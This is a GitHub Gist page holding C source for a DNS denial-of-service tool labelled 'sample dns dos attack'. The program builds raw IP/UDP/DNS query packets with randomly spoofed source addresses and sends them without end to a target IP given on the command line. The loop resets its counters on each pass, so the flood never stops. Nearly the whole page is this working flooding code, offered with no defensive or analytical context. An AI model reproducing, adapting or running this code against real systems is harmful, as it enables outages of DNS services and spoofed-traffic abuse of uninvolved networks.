Created
July 23, 2012 17:56
-
-
Save fakessh/3165008 to your computer and use it in GitHub Desktop.
simple dns dos
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/********************* | |
sample dns dos attack | |
*********************/ | |
#include<arpa/nameser.h> | |
#include<stdio.h> | |
#include<sys/types.h> | |
#include<string.h> | |
#include<sys/socket.h> | |
#include<unistd.h> | |
#include<stdlib.h> | |
#include<netinet/in.h> | |
#include<time.h> | |
#include<netinet/ip.h> | |
#include<netdb.h> | |
#include<arpa/inet.h> | |
struct ipheader //ip header | |
{ | |
unsigned char ip_hl:4,ip_v:4;// | |
unsigned char ip_tos; // | |
unsigned short int ip_len; // | |
unsigned short int ip_id; // | |
unsigned short int ip_off; // | |
unsigned char ip_ttl; // | |
unsigned char ip_p; // | |
unsigned short int ip_sum; // | |
unsigned int ip_src; // | |
unsigned int ip_dst; // | |
}; | |
struct udpheader //udp header | |
{ | |
unsigned short int port_src; // | |
unsigned short int port_dst; // | |
unsigned short int udp_len; // | |
unsigned short int udp_sum; // | |
}; | |
struct dns_msg //send bag | |
{ | |
struct ipheader ip; //ip | |
struct udpheader udp; //udp | |
HEADER dnshead; //dns | |
char dnsbuf[100]; //udp | |
}; | |
u_short checksum(u_short *addr,int len)// | |
{ | |
u_int32_t sum=0; | |
u_int16_t *ad=addr,result; | |
while(len>1) | |
{ | |
sum+=*ad++; // | |
len-=2; | |
} | |
sum=(sum>>16)+(sum&0xffff); // | |
sum+=(sum>>16); | |
result=~sum; // | |
return(result); | |
} | |
int main(int argc,char **argv) | |
{ | |
int sockfd; | |
int ord; | |
int i,j,k,l,m; | |
int num=0; | |
struct sockaddr_in my_addr; | |
struct dns_msg dns_data;//send bag | |
srand(time(NULL)); | |
if(argc!=2) | |
{ | |
printf("agrc!=2 agrc =attack dst ip \n"); | |
exit(0); | |
} | |
if((sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)// | |
{ | |
printf("socket err\n"); | |
exit(0); | |
} | |
if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&ord,sizeof(ord))<0)// | |
{ | |
printf("setsockopt err"); | |
exit(0); | |
} | |
my_addr.sin_addr.s_addr=inet_addr(argv[1]); // | |
my_addr.sin_family=AF_INET; | |
my_addr.sin_port=htons(53); | |
/*sample construct boucle*/ | |
for(i=97;i<123;i++) | |
for(j=97;j<123;j++) | |
for(k=97;k<123;k++) | |
{ | |
i=97;j=97;k=97; | |
printf("%d\n",num); | |
num++; | |
bzero(&dns_data,sizeof(struct dns_msg)); | |
//fill ip head | |
dns_data.ip.ip_v=4; | |
dns_data.ip.ip_hl=(sizeof(struct ip)/4); | |
dns_data.ip.ip_tos=0; | |
// dns_data.ip.ip_len=sizeof(dns_data); | |
dns_data.ip.ip_id=random(); | |
dns_data.ip.ip_off=0; | |
dns_data.ip.ip_ttl=255; | |
dns_data.ip.ip_p=IPPROTO_UDP; | |
dns_data.ip.ip_sum=0; | |
dns_data.ip.ip_dst=my_addr.sin_addr.s_addr; | |
dns_data.ip.ip_src=random(); | |
//fill udp head | |
dns_data.udp.port_dst=htons(53); | |
dns_data.udp.port_src=htons(1024+(rand()%2000));// | |
dns_data.udp.udp_len=htons(31);//htons(sizeof(struct dns_msg)-sizeof(struct ipheader)); | |
dns_data.udp.udp_sum=0; | |
//fill dns head | |
dns_data.dnshead.id=random(); | |
dns_data.dnshead.rd=0; | |
dns_data.dnshead.ra=1;// | |
dns_data.dnshead.aa=0;// | |
dns_data.dnshead.tc=0; // | |
dns_data.dnshead.opcode=QUERY;// | |
dns_data.dnshead.qdcount=htons(1);// | |
dns_data.dnshead.ancount=htons(0);// | |
dns_data.dnshead.nscount=htons(0);// | |
dns_data.dnshead.arcount=htons(0);// | |
dns_data.dnshead.qr=0;//query bag | |
//fill domain query | |
dns_data.dnsbuf[0]=1; | |
dns_data.dnsbuf[1]=i; | |
dns_data.dnsbuf[2]=1; | |
dns_data.dnsbuf[3]=j; | |
dns_data.dnsbuf[4]=1; | |
dns_data.dnsbuf[5]=k; | |
dns_data.dnsbuf[6]=0; | |
dns_data.dnsbuf[8]=1; | |
dns_data.dnsbuf[10]=1; | |
dns_data.dnshead.id=random(); | |
//fill checksum | |
u_char *pseudo,pseudoHead[44];// | |
bzero(pseudoHead,44); | |
pseudo=pseudoHead; | |
memcpy(pseudo,&(dns_data.ip.ip_src),8); | |
pseudo+=9; | |
memcpy(pseudo,&(dns_data.ip.ip_p),1); | |
pseudo++; | |
memcpy(pseudo,&(dns_data.udp.udp_len),2); | |
pseudo+=2; | |
memcpy(pseudo,&(dns_data.udp),sizeof(struct udpheader)); | |
pseudo+=8; | |
memcpy(pseudo,&(dns_data.dnshead),sizeof(HEADER)); | |
pseudo+=12; | |
memcpy(pseudo,&(dns_data.dnsbuf),11);//strlen(dns_data.dnsbuf)); | |
dns_data.udp.udp_sum=checksum((u_short *)pseudoHead,44); | |
sendto(sockfd,&dns_data,51,0,(struct sockaddr *)&my_addr,sizeof(struct sockaddr_in));// | |
} | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment